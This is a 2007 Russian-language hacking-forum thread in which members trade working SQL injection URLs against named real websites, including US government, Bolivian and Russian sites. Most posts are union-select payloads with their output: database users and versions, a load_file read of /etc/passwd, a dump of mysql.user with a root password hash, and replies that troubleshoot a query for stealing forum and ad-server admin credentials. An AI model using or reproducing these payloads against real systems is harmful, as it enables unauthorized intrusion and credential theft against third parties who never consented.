ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.09.2007, 15:05
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Код:
http://www.tahuichi.com.bo/noticia.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11/*&idioma=Ingles tahuichi@hosting2.cotas.com.bo:5.0.27:dbtahuichi
Код HTML:
http://www.iglesia.org.bo/sitio/comisiones/comisionbase.php?id=9999+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database()),7/* iglesia_iglesia@localhost:4.1.22-standard:iglesia_ceb
|
|
|
23.09.2007, 16:36
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Mssql+gov
MSSQL+GOV
tms.apps.em.doe.gov
Код:
http://tms.apps.em.doe.gov/current/ost/Review/TkRvTASLi.asp?ApplicationID=-1+or+1=@@version--
http://tms.apps.em.doe.gov/current/ost/Review/TkRvTASLi.asp?ApplicationID=-1+or+1=(select+system_user)--
www.workforcekentucky.ky.gov
Код:
http://www.workforcekentucky.ky.gov/cgi/dataanalysis/cesReport.asp?tableName=CES&dataColumns=earnings%2C+empces%2C+hourearn%2C+hours%2C+empprodwrk&ID=-1+or+1=@@version--
http://www.workforcekentucky.ky.gov/cgi/dataanalysis/cesReport.asp?tableName=CES&dataColumns=earnings%2C+empces%2C+hourearn%2C+hours%2C+empprodwrk&ID=-1+or+1=(select+system_user)--
www3.fmc.gov
Код:
http://www3.fmc.gov/btaagmnts/amend_func2_npage.asp?agmtnum=-1'+or+1=@@version--
http://www3.fmc.gov/btaagmnts/amend_func2_npage.asp?agmtnum=123'+union+select+1,system_user,3,4--
кому интересно дальше ройте...
|
|
|
|
23.09.2007, 16:48
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286
Репутация:
187
|
|
Код:
http://www.captains-club.ru/index.php?id=110%20union%20select%201,2,COLUMN_NAME,4,5,6,7,8,9,10%20from%20INFORMATION_SCHEMA.COLUMNS/*
Код:
http://www.captains-club.ru/index.php?id=110%20union%20select%201,2,TABLE_NAME,4,5,6,7,8,9,10%20from%20INFORMATION_SCHEMA.TABLES/*
Код:
http://www.avvakul.ru/index.php?id=2&p=6&tid=60%20union%20select%201,TABLE_NAME,3,4,5%20fro m%20INFORMATION_SCHEMA.TABLES/*
Код:
http://www.avvakul.ru/index.php?id=2&p=6&tid=60%20union%20select%201,COLUMN_NAME,3,4,5%20fr om%20INFORMATION_SCHEMA.COLUMNS/*
Код:
http://www.vipsoft.by/index.php?id=200%20union%20select%201,TABLE_NAME,3%20from%20INFORMATION_SCHEMA.TABLES/*
Код:
http://www.vipsoft.by/index.php?id=200%20union%20select%201,COLUMN_NAME,3%20from%20INFORMATION_SCHEMA.COLUMNS/*
Последний раз редактировалось kair; 23.09.2007 в 17:09..
|
|
|
|
23.09.2007, 17:14
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
интересная скуля
код:
http://www.webtelek.com/includes/products_view.php?pid=-0'+union+select+1,2,concat_ws(0x3a,table_name,colu mn_name),4+from+information_schema.columns/*
жаль незнаю как добиться вывода инфы,на все запросы к бд выдает такую ошибку :
1146 - Table 'webtelek_com.xxx_xxx' doesn't exist
select image_url, display_name, description, pvr_status from channel where connectv_id is not null and products_id = '-0' union select 1,2,concat_ws
(0x3a,clientname,clientpassword),4 from phpads_clients/*' and (pvr_status IS NULL OR pvr_status='N' OR pvr_status <> 'X') order by rank
[TEP STOP]
разъясните ламеру,кому не лень 
спасибо [53X]Shadowкод:
http://www.webtelek.com/includes/products_view.php?pid=-0+'union+select+1,2,concat_ws(0x3a,username,user_p assword,user_icq,user_email),4+from+phpbb.phpbb_us ers/*
Последний раз редактировалось fobofob; 23.09.2007 в 18:00..
|
|
|
|
23.09.2007, 17:38
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Сообщение от fobofob
интересная скуля
код:
http://www.webtelek.com/includes/products_view.php?pid=-0'+union+select+1,2,concat_ws(0x3a,table_name,colu mn_name),4+from+information_schema.columns/*
жаль незнаю как добиться вывода инфы,на все запросы к бд выдает такую ошибку :
1146 - Table 'webtelek_com.xxx_xxx' doesn't exist
select image_url, display_name, description, pvr_status from channel where connectv_id is not null and products_id = '-0' union select 1,2,concat_ws
(0x3a,clientname,clientpassword),4 from phpads_clients/*' and (pvr_status IS NULL OR pvr_status='N' OR pvr_status <> 'X') order by rank
[TEP STOP]
разъясните ламеру,кому не лень Ты не ту схему(базу данных юзаешь) для phpads_clients
сначала выясняем имя бд вот так
Код:
http://www.webtelek.com/includes/products_view.php?pid=-0'+union+select+1,2,table_schema,4+from+information_schema.tables+where+table_name='phpads_clients'/*
а затем через точку делаем запрос к нужной таблице
Код:
http://www.webtelek.com/includes/products_view.php?pid=-0%20'union%20select%201,2,concat_ws(0x3a,clientname,clientpassword),4%20from%20phpads.phpads_clients/*
подробнее здесь:
https://forum.antichat.ru/showpost.php?p=442627&postcount=26
Последний раз редактировалось [53x]Shadow; 23.09.2007 в 17:44..
|
|
|
|
23.09.2007, 17:44
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
[53x]Shadow,fobofob в таблице phpds_clients ничего интересного не найдете. По умолчанию в таблице phpads_config содержаться логины и мд5 хеши паролей админов, колонки admin,admin _pw
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 23.09.2007 в 17:48..
|
|
|
|
23.09.2007, 17:50
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Сообщение от Constantine
[53x]Shadow,fobofob в таблице phpds_clients ничего интересного не найдете. По умолчанию в таблице phpads_config содержаться логины и мд5 хеши паролей админов, колонки admin,admin _pw
Хм.. я в принципе там ничего и не искал, просто объяснил человеку где ошибка, но в принципе в phpads_config только имя и хеш админа, а в phpads_clients дофига разных хешей =)
|
|
|
|
23.09.2007, 18:05
|
|
Познающий
Регистрация: 15.06.2007
Сообщений: 39
Провел на форуме:
262630
Репутация:
20
|
|
Код:
http://www.groza.ru/index.php?m=servers&a=view&sid=-2+union+select+1,version(),3,4,5/*&id=0
Код:
http://www.ceidot.com/adres.php?id=-11+union+select+1,user(),3/*
Код:
http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,4,5,6,7,8,1,1,1/*
|
|
|
|
23.09.2007, 18:37
|
|
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
Провел на форуме:
2360904
Репутация:
1393
|
|
Код:
http://www.g-h.co.uk/links.php?page=-1+union+select+0,1,2,3,4,5,6,7,load_file(0x2F6574632F706173737764),9,10,11/*
/etc/passwd
Код:
http://www.g-h.co.uk/links.php?page=-1+union+select+0,1,2,3,4,5,6,7,concat(user,char(58),password),9,10,11+from+mysql.user/*
Очередной рут )
root:3facb56d34db5a20 |
|
|
|
24.09.2007, 02:19
|
|
Познающий
Регистрация: 13.02.2006
Сообщений: 82
Провел на форуме:
539650
Репутация:
37
|
|
http://www.ps3tag.com/formProcess.asp?doForm=5&step=
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?466343){kind=avatar}
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?466421){kind=avatar}
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?466436){kind=avatar}
Похожие темы
Линейный вид
